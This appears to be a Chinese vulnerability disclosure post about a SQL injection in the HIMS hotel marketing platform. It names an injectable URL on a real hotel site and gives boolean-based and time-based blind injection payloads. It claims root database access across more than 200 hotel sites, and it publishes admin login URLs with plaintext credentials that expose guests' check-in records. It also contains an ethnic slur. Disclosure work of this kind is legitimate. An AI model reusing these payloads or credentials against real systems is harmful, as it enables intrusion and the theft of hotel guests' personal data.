SQL注入点
http://www.wxinn.com/hotel/PhotoC.php?type=1 可注入链接。
注入类型
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: type=1' AND 7068=7068 AND 'aBZa'='aBZa
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: type=1' AND SLEEP(5) AND 'naeJ'='naeJ
该酒店用的是北京万维罗盘信息技术有限公司的 罗盘互联网营销解决方案(HIMS)。 该域名竟然解析到了小日本的ip上。
该ip下竟然有200多个网站,基本都是酒店的
![罗盘互联网营销解决方案(HIMS)<a target=]() SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136352.gif" border="0" "/>
root权限
![罗盘互联网营销解决方案(HIMS)<a target=]() SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136155.gif" border="0" "/>
数据库个数
![罗盘互联网营销解决方案(HIMS)<a target=]() SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136854.gif" border="0" "/>
服务器中的部分数据库,一个数据库一个网站
![罗盘互联网营销解决方案(HIMS)<a target=]() SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136422.gif" border="0" "/>
使用一个用户hims ipms123/luopan123456 登录两个网站的后台
http://www.6877777.com/admin/login.php丽江和玺酒店
![罗盘互联网营销解决方案(HIMS)<a target=]() SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136712.gif" border="0" "/>
http://www.wxinn.com/admin/login.php文星连锁酒店,查看入住用户信息
![罗盘互联网营销解决方案(HIMS)<a target=]() SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254137917.gif" border="0" "/>
|